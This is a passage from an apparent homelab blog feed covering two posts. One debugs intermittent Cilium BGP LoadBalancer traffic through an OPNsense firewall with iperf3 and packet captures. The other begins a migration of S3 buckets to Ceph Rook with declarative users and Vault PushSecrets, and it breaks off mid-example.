            <p>The state type for rules which concern asymmetric routing needs to be set to &lsquo;sloppy state&rsquo;</p>
        </figcaption>
</figure>
</p>
<p>That was this problem fixed, and the upload started working - but incredibly
slowly. I got long phases with no transmission at all and some retries. It
looked like this:</p>
<pre tabindex="0"><code>upload: &#39;./public/404.html&#39; -&gt; &#39;s3://wiki/404.html&#39;  [1 of 97]


 9287 of 9287   100% in    0s     3.35 MB/s
 9287 of 9287   100% in    0s    33.80 KB/s  done

upload: &#39;./public/categories/index.html&#39; -&gt; &#39;s3://wiki/categories/index.html&#39;  [2 of 97]


 34120 of 34120   100% in    0s     6.75 MB/s
 34120 of 34120   100% in    0s   304.53 KB/s  done

upload: &#39;./public/ceph/index.html&#39; -&gt; &#39;s3://wiki/ceph/index.html&#39;  [3 of 97]


 34195 of 34195   100% in    0s     5.34 MB/s
 34195 of 34195   100% in    0s     5.34 MB/s  failed

WARNING: Upload failed: /ceph/index.html (The read operation timed out)

WARNING: Waiting 3 sec...

upload: &#39;./public/ceph/index.html&#39; -&gt; &#39;s3://wiki/ceph/index.html&#39;  [3 of 97]


 34195 of 34195   100% in    0s   769.35 KB/s
 34195 of 34195   100% in    0s   101.93 KB/s  done

upload: &#39;./public/ceph/index.xml&#39; -&gt; &#39;s3://wiki/ceph/index.xml&#39;  [4 of 97]
</code></pre><p>The pattern here seemed to be: Initially, the uploads work for a very short while,
and then they stop working. And at some later point, the transmission works
again.</p>
<h2 id="setting-up-an-iperf3-pod">Setting up an iperf3 Pod</h2>
<p>I wasn&rsquo;t able to make anything of the log output, so I built myself a test setup with
an iperf3 pod in the k8s cluster, made available via a LoadBalancer service
similar to how my ingress is made available.</p>
<p>As the basis, I&rsquo;m using the <a href="https://github.com/wbitt/Network-MultiTool">network-multitool</a>
container, in the <code>:extra</code> variant. I&rsquo;m launching the Pod via this Deployment:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">network-multitool</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">app</span>: <span style="color:#ae81ff">network-multitool</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">app</span>: <span style="color:#ae81ff">network-multitool</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">network-multitool</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">wbitt/network-multitool:extra</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">command</span>: [<span style="color:#e6db74">&#34;iperf3&#34;</span>]
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-p&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;55343&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-s&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">http-port</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: <span style="color:#ae81ff">8080</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">iperf-port</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: <span style="color:#ae81ff">55343</span>
</span></span></code></pre></div><p>By default, the container runs a simple webserver. I&rsquo;m changing that here to
running an iperf3 instance in server mode.
In addition, I&rsquo;ve created the following Service to make the iperf3 server
externally available:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Service</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">iperf</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">app</span>: <span style="color:#ae81ff">network-multitool</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/public-service</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/hostname</span>: <span style="color:#ae81ff">iperf-k8s.example.com</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">io.cilium/lb-ipam-ips</span>: <span style="color:#ae81ff">10.86.55.12</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">LoadBalancer</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">externalTrafficPolicy</span>: <span style="color:#ae81ff">Local</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">app</span>: <span style="color:#ae81ff">network-multitool</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">iperf-port</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">port</span>: <span style="color:#ae81ff">55343</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targetPort</span>: <span style="color:#ae81ff">55343</span>
</span></span></code></pre></div><p>Once that service is created, Cilium will announce a route to the IP <code>10.86.55.12</code>
with the k8s node currently running the iperf3 Pod as the next hop. This
route will be used by my OPNsense box. As the <code>10.86.55.0/24</code> subnet is not the
same as my Homelab VLAN&rsquo;s subnet, all traffic to the iperf3 instance will go
through the OPNsense box.</p>
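<p>The tests below were run with a plain iperf3 client pointed at the LoadBalancer
IP, roughly like this (the exact flags may have differed slightly from what I
actually typed):</p>
<pre tabindex="0"><code># 60 second run against the iperf3 server behind the LoadBalancer IP,
# reporting in 5 second intervals
iperf3 -c 10.86.55.12 -p 55343 -t 60 -i 5
</code></pre>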
<p>I started with a simple test, running from a different host inside the Homelab
VLAN.
<figure>
    <img loading="lazy" src="iperf3-homelab-net.png"
         alt="A screenshot of an iperf3 session. The session ran for a total of 60 seconds. During the first 5 seconds, there was a bit of traffic, with a bitrate of 519 kbit/s and a total of 317 kB transferred. Then, for the time from 5s to 50s, absolutely no traffic happened. Both transfers and bitrates are zero. At 50 - 55 seconds, a transfer of 91 MB at a bitrate of 153 Mbit/s is registered. In the final interval, 55 seconds to 60 seconds, 538 MB are transferred with a bitrate of 903 Mbit/s. The final tally over the whole 60 seconds is a bitrate of 88 Mbit/s and a total amount transferred of 639 MB."/> <figcaption>
            <p>Transfer from a Homelab host as the iperf3 client.</p>
        </figcaption>
</figure>
</p>
<p>This test showed a somewhat similar behavior. Initially, the transmission works,
but then it just stops. For about 45 seconds, in this case. And then, rather
suddenly, the transmission starts up again. At least I could now reproduce
the problem at will.
I conducted a separate test, this one from my workstation, which is in a separate
VLAN:
<figure>
    <img loading="lazy" src="iperf3-desktop.png"
         alt="A screenshot of an iperf3 session. The session ran for a total of 60 seconds. This one shows relatively consistent bitrates of about 920 Mbit/s and around 540 MB transferred per 5 second internal. In total, 6.36 GB were transferred, at an average rate of 911 Mbit/s."/> <figcaption>
            <p>Same iperf3 server in a k8s Pod, but with my workstation, from my management VLAN, showing the expected (almost) line speed.</p>
        </figcaption>
</figure>
</p>
<p>So, from the management VLAN, I get full line speed, and no weird gaps in the
transmission. There are two differences here: First, the Homelab VLAN transmission
happened over the same VLAN, with the node hosting the iperf3 pod being in the
same subnet as the client. The second difference, and as it turns out, the more
relevant one, is that the management VLAN has very few firewall rules, while
the Homelab is nailed pretty much shut.</p>
<p>So I went investigating some more. As seems to be the case way too often in this
Kubernetes migration, it was Wireshark o&rsquo;clock again.</p>
<p>The initial packet captures, from both the iperf3 pod and the client on another
host, showed exactly what I was expecting, except for a big hole of about 45 seconds
in the traffic that I couldn&rsquo;t explain before the traffic started up again.</p>
<p>I also gathered some data on my router, specifically on the interface
which leads to my Homelab. And it showed something interesting.</p>
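<p>The capture on the router was done with something along these lines, run on the
OPNsense box (the interface name is just a placeholder for the Homelab VLAN
interface):</p>
<pre tabindex="0"><code># Capture all traffic to or from the iperf3 LoadBalancer IP on the Homelab VLAN
# interface and write it to a file for later inspection in Wireshark
tcpdump -i igb1 -w /tmp/iperf-lb.pcap host 10.86.55.12
</code></pre>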
<p>First, here is the initial, successful transmission:</p>
<pre tabindex="0"><code>113	0.058354	10.86.5.125	10.86.55.12	TCP	1434	55643 → 55343 [ACK] Seq=62966 Ack=1 Win=64256 Len=1368 TSval=115511759 TSecr=1303863917
</code></pre><p>Then, and this is the important point, comes a second transmission, seemingly
of the same packet, which is marked by Wireshark as a TCP re-transmission:</p>
<pre tabindex="0"><code>114	0.058357	10.86.5.125	10.86.55.12	TCP	1434	[TCP Retransmission] 55643 → 55343 [ACK] Seq=62966 Ack=1 Win=64256 Len=1368 TSval=115511759 TSecr=1303863917
</code></pre><p>What this actually is becomes obvious when looking at the L2 source MAC address.
The first packet is arriving from the MAC that belongs to the Pi I was running
the iperf3 client on, with the target MAC being the interface for Homelab VLAN
traffic on my OPNsense box.
The second packet, though, was sent out with the MAC of the OPNsense box as the source,
and the MAC of the next-hop host for the LoadBalancer IP as the target.</p>
<p>And now comes the interesting part. After some successful transmissions, the
following happens:</p>
<pre tabindex="0"><code>158	0.059077	10.86.5.125	10.86.55.12	TCP	1434	55643 → 55343 [ACK] Seq=121790 Ack=1 Win=64256 Len=1368 TSval=115511759 TSecr=1303863918
[...]
165	0.059217	10.86.5.125	10.86.55.12	TCP	1434	55643 → 55343 [ACK] Seq=131366 Ack=1 Win=64256 Len=1368 TSval=115511759 TSecr=1303863918
[...]
175	54.149140	10.86.5.125	10.86.55.12	TCP	1434	[TCP Retransmission] 55643 → 55343 [ACK] Seq=65702 Ack=1 Win=64256 Len=1368 TSval=115565850 TSecr=1303863918
</code></pre><p>All of these packets, right up to the last one, packet number 175, are coming
from the Raspberry Pi serving as a client. At the same time, I&rsquo;m not seeing any
packets at all coming out of the OPNsense box, like the second packet from the
previous sequence. This looks like the firewall just blackholes the packets,
or as if routing temporarily fails.
And then it starts working again, without me actually doing anything:</p>
<pre tabindex="0"><code>176	54.149156	10.86.5.125	10.86.55.12	TCP	1434	[TCP Retransmission] 55643 → 55343 [ACK] Seq=65702 Ack=1 Win=64256 Len=1368 TSval=115565850 TSecr=1303863918
177	54.150365	10.86.5.125	10.86.55.12	TCP	1434	55643 → 55343 [ACK] Seq=135470 Ack=1 Win=64256 Len=1368 TSval=115565851 TSecr=1303918009
178	54.150400	10.86.5.125	10.86.55.12	TCP	1434	[TCP Retransmission] 55643 → 55343 [ACK] Seq=135470 Ack=1 Win=64256 Len=1368 TSval=115565851 TSecr=1303918009
</code></pre><p>Here the behavior is the same as in the beginning: The packet arrives with the Pi
as the source MAC and then leaves again with the firewall&rsquo;s MAC as the source.</p>
<p>And I&rsquo;m still not sure what this is all about - the suspicious, about 45 second
interval where no packets are routed.
So I will call my solution a workaround, and not a fix - because I might have
just fought a symptom, instead of the root problem.</p>
<p>The fix was to create another firewall rule, allowing access from the Homelab
VLAN to the IP of the iperf LoadBalancer. This must sound weird. But in my initial configuration,
I only allowed the Homelab access to specific other machines on specific ports,
and I normally only have inbound rules for most stuff besides the IoT VLAN.</p>
<p>What I did in OPNsense was to create an OUT rule, allowing access from the
Homelab VLAN to the IP of the iperf LoadBalancer service. And all of a sudden,
it all started working.</p>
<p>What&rsquo;s annoying me is that I have no explanation at all for this kind of behavior.
I mean sure, I think I understand why the firewall would block the packet when
it tries to leave the OPNsense box in the direction of my Homelab. But - why
does the iperf transmission start to work, all of a sudden? And why does it
work at the very beginning of the transmission? That&rsquo;s what I don&rsquo;t get. If the
missing firewall rule was the root cause, shouldn&rsquo;t it not work at all - instead
of just not work for 45 seconds in the middle of a connection?</p>
<p>And I&rsquo;ve also tried longer transmissions, e.g. 2 minutes instead of one. And
here I saw the same pattern: first a couple of successful packets, then a
45 second hole, and then it worked for the entire remainder of the
test.</p>
<p>If any of my readers has any idea what&rsquo;s going on here, why I need the
firewall rule, and why only some part of the iperf transmission was blocked,
I would be very happy to hear about it on <a href="https://social.mei-home.net/@mmeier">Mastodon</a>.</p>
<h2 id="conclusion">Conclusion</h2>
<p>To summarize, when setting up Cilium BGP within a pretty restricted OPNsense
firewall environment, check whether you&rsquo;ve got asymmetric routing going on.
If so, set the state tracking for the rule allowing access to the LoadBalancer
IP to <code>sloppy state</code>. In addition, add an outgoing rule on the VLAN of the
next hop advertised in the route to the LoadBalancer IP to make sure packets
don&rsquo;t get randomly dropped.</p>
<p>Finally, I&rsquo;m sadly still not sure what exactly is going on here.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 5: Non-service S3 Buckets</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-5-s3-buckets/</link>
      <pubDate>Thu, 25 Jan 2024 20:50:41 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-5-s3-buckets/</guid>
      <description>Migrating non-service S3 buckets over to the Ceph Rook cluster</description>
      <content:encoded><![CDATA[<p>Wherein I document how I migrated some S3 buckets over to the Ceph Rook cluster
and with that, made it load-bearing.</p>
<p>This is part six of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>So why write a post about migrating S3 buckets, and why do it at this point of
the Nomad -&gt; k8s migration? In short, it just fit in here very well. I already
planned to make Ceph Rook one of the first services to set up anyway. And then
the logical next step is to have a look at what I can then migrate over without
any other dependencies. And the answer to that was: Some <em>non-service</em> S3 buckets.
With &ldquo;non-service&rdquo; I mean those buckets which are not directly tied to specific
services running on the cluster, like Mastodon&rsquo;s media files bucket or Loki&rsquo;s
log storage bucket. Those I will migrate over with their respective services.</p>
<p>Instead, the buckets I&rsquo;m migrating over are things like my blog and wiki buckets.
Those run on Hugo and have been served directly by my Traefik proxy from S3
buckets. So with the <a href="https://blog.mei-home.net/posts/k8s-migration-3-traefik-ingress/">previous Traefik ingress setup</a>
and Ceph Rook being set up, I had all the dependencies in place.</p>
<p>The final reason to do it right now is that I wanted to make the cluster
<em>load-bearing</em> ASAP. A little bit of that was to prevent myself from getting
into <em>too much</em> experimentation. Let&rsquo;s see whether that is going to pan out. &#x1f605;</p>
<h1 id="previous-setup-and-advantages-of-the-new-one">Previous setup and advantages of the new one</h1>
<p>Before getting into the S3 bucket setup with Ceph Rook and Ansible, let me
talk briefly about how the current setup on my baremetal Ceph cluster worked.</p>
<p>In one word: <em>Manually</em></p>
<p>So what&rsquo;s needed to create an S3 bucket and a new user and to configure that
bucket, manually?</p>
<p>Let&rsquo;s start with the user creation:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>radosgw-admin user create --uid<span style="color:#f92672">=</span>USERNAME --display-name <span style="color:#e6db74">&#34;Description here&#34;</span>
</span></span></code></pre></div><p>This will output the new user&rsquo;s access ID and secret key. To make the credentials
usable by Nomad jobs, they also need to be written into Vault:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span> vault kv put secret/some/path id<span style="color:#f92672">=</span>ID key<span style="color:#f92672">=</span>-
</span></span></code></pre></div><p>This would plop up a prompt to enter the secret key. As my internal docs say:</p>
<blockquote>
<p>NOTE THE SPACE AT THE BEGINNING OF THE LINE!
That&rsquo;s to prevent even the access ID from finding its way into your history.</p></blockquote>
<p>I&rsquo;d then use <a href="https://min.io/docs/minio/linux/reference/minio-mc.html">MinIO&rsquo;s S3 client</a>
to create the bucket:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>mc alias set s3-SERVICENAME https://s3.example.com
</span></span><span style="display:flex;"><span>mc mb s3-SERVICENAME/BUCKETNAME
</span></span></code></pre></div><p>I&rsquo;m using the MinIO client mostly because I like the interface, although I don&rsquo;t
use MinIO itself.</p>
<p>That creates a bucket which can only be accessed with the previously created
credentials.
To provide a full bucket policy, I&rsquo;ve got to switch to a different command,
namely <a href="https://s3tools.org/s3cmd">s3cmd</a>, as MinIO does not support bucket
policies.</p>
<p>So I&rsquo;m then putting the credentials in a second place, for use with <code>s3cmd</code>,
and then create a JSON file for the policy to finally upload it with a command
like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>s3cmd -c .s3cmd.conf setpolicy policy.json s3://BUCKETNAME
</span></span></code></pre></div><p>All of the previous commands need to be entered in the right order and the right
format, and for the right bucket with the right credentials. Lots of places for
user error.</p>
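<p>For reference, the <code>.s3cmd.conf</code> mentioned above is just a small INI file.
A minimal version (keys and endpoint are placeholders, not my real values) might
look roughly like this:</p>
<pre tabindex="0"><code># Write a minimal s3cmd config pointing at the Ceph RGW endpoint
cat &gt; .s3cmd.conf &lt;&lt;EOF
[default]
access_key = ABCDE
secret_key = FGHIJ
host_base = s3.example.com
host_bucket = s3.example.com
use_https = True
EOF
</code></pre>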
<p>And that&rsquo;s the main thing I&rsquo;m gaining from the new approach with Ceph Rook and
Ansible: Declarative creation of users, buckets and policies. This has the added
bonus of finally being able to version-control the S3 bucket setup.</p>
<h1 id="creating-users-buckets-and-policies-declaratively">Creating users, buckets and policies declaratively</h1>
<p>There are broadly three pieces to creating a bucket with my new approach:</p>
<ol>
<li>Create the S3 user in Ceph</li>
<li>Write the credentials into Vault</li>
<li>Use those credentials in Ansible to create the bucket and set policies</li>
</ol>
<p>Before I continue, there&rsquo;s one important note: Rook has an <a href="https://rook.io/docs/rook/latest-release/Storage-Configuration/Object-Storage-RGW/ceph-object-bucket-claim/">Object Bucket Claim</a>.
This CRD can be used to create buckets together with S3 credentials for that
bucket in the form of a Secret. I will use this CRD later on, when I&rsquo;m migrating
actual services, to create their individual S3 buckets. And this is exactly
what those bucket claims are intended for. But for the buckets I&rsquo;m migrating here,
I need access to them outside Kubernetes, and I need to do things like
setting bucket policies to allow access for multiple users. The object bucket
claim can do neither of those things.
So using OBCs here would still leave me configuring policies and external access by hand, defeating the purpose of doing everything declaratively.</p>
<p>Also worth mentioning is <a href="https://container-object-storage-interface.github.io/">COSI</a>,
the <em>Container Object Storage Interface</em>. This is similar to the CSI, a
provider-agnostic way to provide object storage buckets. But it&rsquo;s currently still
experimental, both in Kubernetes and in Rook.</p>
<p>With that out of the way, let&rsquo;s create an S3 user in Rook. This is done with
the <a href="https://rook.io/docs/rook/latest-release/CRDs/Object-Storage/ceph-object-store-user-crd/">CephObjectStoreUser</a> CRD. It might look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">ceph.rook.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CephObjectStoreUser</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-user</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">rook-cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">store</span>: <span style="color:#ae81ff">rgw-bulk</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">clusterNamespace</span>: <span style="color:#ae81ff">rook-cluster</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">displayName</span>: <span style="color:#e6db74">&#34;A user for demo purposes&#34;</span>
</span></span></code></pre></div><p>When applying this manifest, Rook will create a user named <code>my-user</code> and
automatically create a Secret with the user&rsquo;s credentials. This secret will
be stored in the given namespace, <code>rook-cluster</code> in this case. Note that by
default, Rook only allows creation of <code>CephObjectStoreUser</code> objects in the
namespace of the Rook operator itself. This can be overridden during creation
of the <code>CephObjectStore</code> in the cluster Helm chart, but it seems to be a prudent
measure to only allow those who can write into the cluster namespace to
actually create users.</p>
<p>The name of the secret for the example above will be <code>rook-ceph-object-user-rgw-bulk-my-user</code>.
The first part is the Rook operator namespace name (note that this is <em>not</em> the
cluster namespace necessarily, but the <em>operator&rsquo;s</em> NS). Then follows the string
<code>ceph-object-user</code> followed by the name of the <code>CephObjectStore</code> the user is
going to be created in. The last part is the username itself.</p>
<p>The secret will have the following <code>data:</code> section:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">AccessKey</span>: <span style="color:#ae81ff">ABCDE</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">Endpoint</span>: <span style="color:#ae81ff">s3.example.com:4711</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">SecretKey</span>: <span style="color:#ae81ff">FGHIJ</span>
</span></span></code></pre></div><p>So it will contain all the info necessary. Also always remember that data is
encoded in base64. So when extracting the credentials for use in other apps,
always push the strings through <code>base64 --decode</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl get -n rook-cluster secrets rook-ceph-object-user-rgw-bulk-my-user --template<span style="color:#f92672">={{</span>.data.AccessKey<span style="color:#f92672">}}</span> | base64 -d
</span></span><span style="display:flex;"><span>kubectl get -n rook-cluster secrets rook-ceph-object-user-rgw-bulk-my-user --template<span style="color:#f92672">={{</span>.data.SecretKey<span style="color:#f92672">}}</span> | base64 -d
</span></span></code></pre></div><p>But of course, a declarative setup isn&rsquo;t worth very much if I then have to
manually push the credentials to Vault as in my old workflow. Instead, I will
be using external-secrets&rsquo; <a href="https://external-secrets.io/latest/api/pushsecret/">PushSecret</a>.
PushSecrets allow me to push Secrets from Kubernetes to a provider, in a reversal
of the ExternalSecret. In this instance, I&rsquo;m using them to push the S3 credentials
created by Rook to my Vault instance, for use in Ansible for the bucket creation.</p>
<p>The first step needed is to update the Vault policy used by the Vault AppRole
used by external-secrets to allow it to not only read, but also write secrets:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">path</span> <span style="color:#e6db74">&#34;secret/my_kubernetes_secrets/cluster/s3/users/*&#34;</span> {
</span></span><span style="display:flex;"><span>  capabilities <span style="color:#f92672">=</span> [ <span style="color:#e6db74">&#34;read&#34;, &#34;create&#34;, &#34;update&#34;</span> ]
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>This allows the AppRole to push secrets, but only to a specific path.</p>
<p>The PushSecret itself then looks like this, again using the credentials of the
previously created user as an example:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">external-secrets.io/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">PushSecret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">s3-my-user</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">rook-cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">deletionPolicy</span>: <span style="color:#ae81ff">Delete</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">refreshInterval</span>: <span style="color:#ae81ff">30m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">secretStoreRefs</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-vault-store</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ClusterSecretStore</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">secret</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>:  <span style="color:#ae81ff">rook-ceph-object-user-rgw-bulk-my-user</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">match</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKey</span>: <span style="color:#ae81ff">AccessKey</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">remoteRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">remoteKey</span>: <span style="color:#ae81ff">secret/my_kubernetes_secrets/cluster/s3/users/my-user</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">property</span>: <span style="color:#ae81ff">access</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">match</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKey</span>: <span style="color:#ae81ff">SecretKey</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">remoteRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">remoteKey</span>: <span style="color:#ae81ff">secret/my_kubernetes_secrets/cluster/s3/users/my-user</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">property</span>: <span style="color:#ae81ff">secret</span>
</span></span></code></pre></div><p>Here again, for security reasons, the PushSecret needs to be in the same
namespace as the Secret it is pushing out to the provider. The <code>deletionPolicy</code>
defines what happens when the PushSecret is deleted. With <code>Delete</code>, the secret
in the secret store will also be removed. With <code>Retain</code>, the secret will be kept.</p>
<p>The <code>selector</code> selects the secret to be pushed, while <code>data:</code> defines what
actually gets pushed. With the config here and considering the Secret format
for S3 credentials created by Rook I showed above, the secret in Vault would
have the following format:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;request_id&#34;</span>: <span style="color:#e6db74">&#34;foo&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;lease_id&#34;</span>: <span style="color:#e6db74">&#34;&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;lease_duration&#34;</span>: <span style="color:#ae81ff">2764800</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;renewable&#34;</span>: <span style="color:#66d9ef">false</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;data&#34;</span>: {
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;access&#34;</span>: <span style="color:#e6db74">&#34;ABCDE&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;custom_metadata&#34;</span>: {
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;managed-by&#34;</span>: <span style="color:#e6db74">&#34;external-secrets&#34;</span>
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;secret&#34;</span>: <span style="color:#e6db74">&#34;FGHIJ&#34;</span>
